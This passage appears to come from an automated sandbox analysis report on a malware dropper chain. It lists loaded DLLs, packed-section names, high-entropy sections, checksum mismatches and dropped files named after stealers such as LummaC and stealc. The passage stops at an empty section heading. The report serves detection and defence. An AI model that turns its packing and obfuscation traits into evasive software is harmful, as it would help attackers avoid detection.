Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winmm.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: wininet.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ncrypt.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ntasn1.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: wldp.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: profapi.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winhttp.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: mswsock.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winnsi.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textinputframework.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: file.exe Static file information: File size 1936896 > 1048576
Source: file.exe Static PE information: Raw size of nkxohnek is bigger than: 0x100000 < 0x1a7400
Source: Binary string: .pdb8 source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rolsroice.pdb source: 66ed86be077bb_12.exe.27.dr
Source: Binary string: rolsroice.pdbX source: 66ed86be077bb_12.exe.27.dr

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 6.2.file.exe.da0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 8.2.skotes.exe.db0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 11.2.skotes.exe.db0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nkxohnek:EW;drssptxt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Unpacked PE file: 13.2.3ec4738210.exe.200000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
Source: C:\Users\user\1000015002\b74664dd7e.exe Unpacked PE file: 14.2.b74664dd7e.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Unpacked PE file: 15.2.3ec4738210.exe.200000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
Source: C:\Users\user\1000015002\b74664dd7e.exe Unpacked PE file: 19.2.b74664dd7e.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Unpacked PE file: 23.2.610cd559ac.exe.e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Unpacked PE file: 26.2.3ec4738210.exe.200000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 27.2.axplong.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 28.2.axplong.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW;
Source: C:\Users\user\1000015002\b74664dd7e.exe Unpacked PE file: 29.2.b74664dd7e.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fcorzhao:EW;ykxfeacd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 30.2.axplong.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 41.2.axplong.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qnrefdmv:EW;gekfttam:EW;.taggant:EW;
Source: acentric[1].exe.27.dr, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: acentric.exe.27.dr, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: penis[1].exe.27.dr Static PE information: 0xDE289906 [Mon Feb 9 22:02:46 2088 UTC]
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 17_2_00DF42DE
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: crypted.exe.27.dr Static PE information: real checksum: 0x0 should be: 0x52b78
Source: 3ec4738210.exe.11.dr Static PE information: real checksum: 0x1c4436 should be: 0x1cedfa
Source: axplong.exe.23.dr Static PE information: real checksum: 0x1d3e08 should be: 0x1cbc28
Source: random[2].exe.27.dr Static PE information: real checksum: 0x1c4436 should be: 0x1cedfa
Source: acentric[1].exe.27.dr Static PE information: real checksum: 0x0 should be: 0x76faf
Source: random[1].exe0.11.dr Static PE information: real checksum: 0x1d3e08 should be: 0x1cbc28
Source: LummaC222222.exe.27.dr Static PE information: real checksum: 0x0 should be: 0x5afcb
Source: skotes.exe.6.dr Static PE information: real checksum: 0x1daa53 should be: 0x1dfca5
Source: random[1].exe1.11.dr Static PE information: real checksum: 0x1c4436 should be: 0x1cedfa
Source: LummaC222222[1].exe.27.dr Static PE information: real checksum: 0x0 should be: 0x5afcb
Source: b74664dd7e.exe.11.dr Static PE information: real checksum: 0x1c4436 should be: 0x1cedfa
Source: crypted[1].exe.27.dr Static PE information: real checksum: 0x0 should be: 0x52b78
Source: stealc_default2[1].exe.27.dr Static PE information: real checksum: 0x0 should be: 0x31181
Source: 2.exe.27.dr Static PE information: real checksum: 0x0 should be: 0xae761
Source: penis[1].exe.27.dr Static PE information: real checksum: 0x0 should be: 0x863c1
Source: 2[1].exe.27.dr Static PE information: real checksum: 0x0 should be: 0xae761
Source: needmoney[1].exe.27.dr Static PE information: real checksum: 0x0 should be: 0x417a7a
Source: acentric.exe.27.dr Static PE information: real checksum: 0x0 should be: 0x76faf
Source: 610cd559ac.exe.11.dr Static PE information: real checksum: 0x1d3e08 should be: 0x1cbc28
Source: stealc_default2.exe.27.dr Static PE information: real checksum: 0x0 should be: 0x31181
Source: file.exe Static PE information: real checksum: 0x1daa53 should be: 0x1dfca5
Source: 4d72d15151.exe.27.dr Static PE information: real checksum: 0x1c4436 should be: 0x1cedfa
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: nkxohnek
Source: file.exe Static PE information: section name: drssptxt
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.6.dr Static PE information: section name:
Source: skotes.exe.6.dr Static PE information: section name: .idata
Source: skotes.exe.6.dr Static PE information: section name:
Source: skotes.exe.6.dr Static PE information: section name: nkxohnek
Source: skotes.exe.6.dr Static PE information: section name: drssptxt
Source: skotes.exe.6.dr Static PE information: section name: .taggant
Source: 3ec4738210.exe.11.dr Static PE information: section name:
Source: 3ec4738210.exe.11.dr Static PE information: section name: .rsrc
Source: 3ec4738210.exe.11.dr Static PE information: section name: .idata
Source: 3ec4738210.exe.11.dr Static PE information: section name:
Source: 3ec4738210.exe.11.dr Static PE information: section name: fcorzhao
Source: 3ec4738210.exe.11.dr Static PE information: section name: ykxfeacd
Source: 3ec4738210.exe.11.dr Static PE information: section name: .taggant
Source: b74664dd7e.exe.11.dr Static PE information: section name:
Source: b74664dd7e.exe.11.dr Static PE information: section name: .rsrc
Source: b74664dd7e.exe.11.dr Static PE information: section name: .idata
Source: b74664dd7e.exe.11.dr Static PE information: section name:
Source: b74664dd7e.exe.11.dr Static PE information: section name: fcorzhao
Source: b74664dd7e.exe.11.dr Static PE information: section name: ykxfeacd
Source: b74664dd7e.exe.11.dr Static PE information: section name: .taggant
Source: random[1].exe0.11.dr Static PE information: section name:
Source: random[1].exe0.11.dr Static PE information: section name: .idata
Source: random[1].exe0.11.dr Static PE information: section name:
Source: random[1].exe0.11.dr Static PE information: section name: qnrefdmv
Source: random[1].exe0.11.dr Static PE information: section name: gekfttam
Source: random[1].exe0.11.dr Static PE information: section name: .taggant
Source: random[1].exe1.11.dr Static PE information: section name:
Source: random[1].exe1.11.dr Static PE information: section name: .rsrc
Source: random[1].exe1.11.dr Static PE information: section name: .idata
Source: random[1].exe1.11.dr Static PE information: section name:
Source: random[1].exe1.11.dr Static PE information: section name: fcorzhao
Source: random[1].exe1.11.dr Static PE information: section name: ykxfeacd
Source: random[1].exe1.11.dr Static PE information: section name: .taggant
Source: 610cd559ac.exe.11.dr Static PE information: section name:
Source: 610cd559ac.exe.11.dr Static PE information: section name: .idata
Source: 610cd559ac.exe.11.dr Static PE information: section name:
Source: 610cd559ac.exe.11.dr Static PE information: section name: qnrefdmv
Source: 610cd559ac.exe.11.dr Static PE information: section name: gekfttam
Source: 610cd559ac.exe.11.dr Static PE information: section name: .taggant
Source: axplong.exe.23.dr Static PE information: section name:
Source: axplong.exe.23.dr Static PE information: section name: .idata
Source: axplong.exe.23.dr Static PE information: section name:
Source: axplong.exe.23.dr Static PE information: section name: qnrefdmv
Source: axplong.exe.23.dr Static PE information: section name: gekfttam
Source: axplong.exe.23.dr Static PE information: section name: .taggant
Source: random[2].exe.27.dr Static PE information: section name:
Source: random[2].exe.27.dr Static PE information: section name: .rsrc
Source: random[2].exe.27.dr Static PE information: section name: .idata
Source: random[2].exe.27.dr Static PE information: section name:
Source: random[2].exe.27.dr Static PE information: section name: fcorzhao
Source: random[2].exe.27.dr Static PE information: section name: ykxfeacd
Source: random[2].exe.27.dr Static PE information: section name: .taggant
Source: 4d72d15151.exe.27.dr Static PE information: section name:
Source: 4d72d15151.exe.27.dr Static PE information: section name: .rsrc
Source: 4d72d15151.exe.27.dr Static PE information: section name: .idata
Source: 4d72d15151.exe.27.dr Static PE information: section name:
Source: 4d72d15151.exe.27.dr Static PE information: section name: fcorzhao
Source: 4d72d15151.exe.27.dr Static PE information: section name: ykxfeacd
Source: 4d72d15151.exe.27.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DCD91C push ecx; ret 11_2_00DCD92F
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E10A76 push ecx; ret 17_2_00E10A89
Source: file.exe Static PE information: section name: entropy: 7.982641711189707
Source: file.exe Static PE information: section name: nkxohnek entropy: 7.953823653253661
Source: skotes.exe.6.dr Static PE information: section name: entropy: 7.982641711189707
Source: skotes.exe.6.dr Static PE information: section name: nkxohnek entropy: 7.953823653253661
Source: 3ec4738210.exe.11.dr Static PE information: section name: fcorzhao entropy: 7.953583099269891
Source: b74664dd7e.exe.11.dr Static PE information: section name: fcorzhao entropy: 7.953583099269891
Source: random[1].exe0.11.dr Static PE information: section name: entropy: 7.9824800968412175
Source: random[1].exe0.11.dr Static PE information: section name: qnrefdmv entropy: 7.954647787076299
Source: random[1].exe1.11.dr Static PE information: section name: fcorzhao entropy: 7.953583099269891
Source: 610cd559ac.exe.11.dr Static PE information: section name: entropy: 7.9824800968412175
Source: 610cd559ac.exe.11.dr Static PE information: section name: qnrefdmv entropy: 7.954647787076299
Source: axplong.exe.23.dr Static PE information: section name: entropy: 7.9824800968412175
Source: axplong.exe.23.dr Static PE information: section name: qnrefdmv entropy: 7.954647787076299
Source: 2[1].exe.27.dr Static PE information: section name: .text entropy: 6.8715374332529295
Source: 2.exe.27.dr Static PE information: section name: .text entropy: 6.8715374332529295
Source: crypted[1].exe.27.dr Static PE information: section name: .text entropy: 7.994735225546955
Source: crypted.exe.27.dr Static PE information: section name: .text entropy: 7.994735225546955
Source: random[2].exe.27.dr Static PE information: section name: fcorzhao entropy: 7.953583099269891
Source: 4d72d15151.exe.27.dr Static PE information: section name: fcorzhao entropy: 7.953583099269891

Persistence and Installation Behavior

